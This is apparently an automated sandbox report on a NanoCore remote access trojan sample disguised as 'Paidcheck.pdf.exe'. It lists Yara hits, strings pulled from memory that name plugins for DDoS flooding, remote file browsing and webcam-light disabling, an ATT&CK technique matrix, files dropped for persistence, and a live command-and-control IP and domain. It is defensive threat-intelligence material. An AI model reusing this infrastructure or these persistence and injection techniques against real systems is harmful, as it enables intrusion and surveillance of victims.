      Source: Yara matchFile source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY

      Remote Access Functionality:

      barindex
      Detected Nanocore RatShow sources
      Source: Paidcheck.pdf.exe, 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegAsm.exe, 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture21System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting111Scheduled Task/Job1Process Injection212Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolInput Capture21Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsScheduled Task/Job1Registry Run Keys / Startup Folder11Scheduled Task/Job1Scripting111Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsPowerShell1Logon Script (Mac)Registry Run Keys / Startup Folder11Obfuscated Files or Information12NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing12LSA SecretsSecurity Software Discovery211SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading12Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion21/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection212Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 452385 Sample: Paidcheck.pdf.exe Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 16 other signatures 2->67 8 Paidcheck.pdf.exe 3 9 2->8         started        12 RegAsm.exe 2->12         started        14 dhcpmon.exe 2->14         started        16 dhcpmon.exe 2->16         started        process3 file4 49 C:\Users\user\AppData\...\explorerr.exe, PE32 8->49 dropped 51 C:\Users\user\AppData\Local\Temp\RegAsm.exe, PE32 8->51 dropped 53 C:\Users\...\explorerr.exe:Zone.Identifier, ASCII 8->53 dropped 57 2 other malicious files 8->57 dropped 73 Creates an undocumented autostart registry key 8->73 75 Writes to foreign memory regions 8->75 77 Injects a PE file into a foreign processes 8->77 18 RegAsm.exe 1 15 8->18         started        23 wscript.exe 1 8->23         started        55 C:\Users\user\AppData\...\RegAsm.exe.log, ASCII 12->55 dropped 25 conhost.exe 12->25         started        27 conhost.exe 14->27         started        29 conhost.exe 16->29         started        signatures5 process6 dnsIp7 59 217.138.212.57, 2018, 49704 M247GB United Kingdom 18->59 43 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 18->43 dropped 45 C:\Users\user\AppData\Local\...\tmp4FE3.tmp, XML 18->45 dropped 47 C:\Program Files (x86)\...\dhcpmon.exe, PE32 18->47 dropped 69 Uses schtasks.exe or at.exe to add and modify task schedules 18->69 31 schtasks.exe 18->31         started        33 schtasks.exe 18->33         started        71 Wscript starts Powershell (via cmd or directly) 23->71 35 powershell.exe 25 23->35         started        file8 signatures9 process10 process11 37 conhost.exe 31->37         started        39 conhost.exe 33->39         started        41 conhost.exe 35->41         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Paidcheck.pdf.exe100%AviraHEUR/AGEN.1118541
      Paidcheck.pdf.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe100%AviraHEUR/AGEN.1118541
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe100%Joe Sandbox ML
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%VirustotalBrowse
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%MetadefenderBrowse
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\RegAsm.exe0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\RegAsm.exe0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\RegAsm.exe0%ReversingLabs
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe33%ReversingLabsByteCode-MSIL.Backdoor.NanoBot

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      10.2.RegAsm.exe.5f60000.23.unpack100%AviraTR/NanoCore.fadteDownload File
      10.2.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      217.138.212.571%VirustotalBrowse
      217.138.212.570%Avira URL Cloudsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://crl.microso0%URL Reputationsafe
      http://crl.microso0%URL Reputationsafe
      http://crl.microso0%URL Reputationsafe
      http://crl.microso0%URL Reputationsafe
      http://crl.microsofX0%Avira URL Cloudsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://crl.micr0%URL Reputationsafe
      http://crl.micr0%URL Reputationsafe
      http://crl.micr0%URL Reputationsafe
      http://crl.micr0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      annapro.linkpc.netfalse
        high
        217.138.212.57true
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
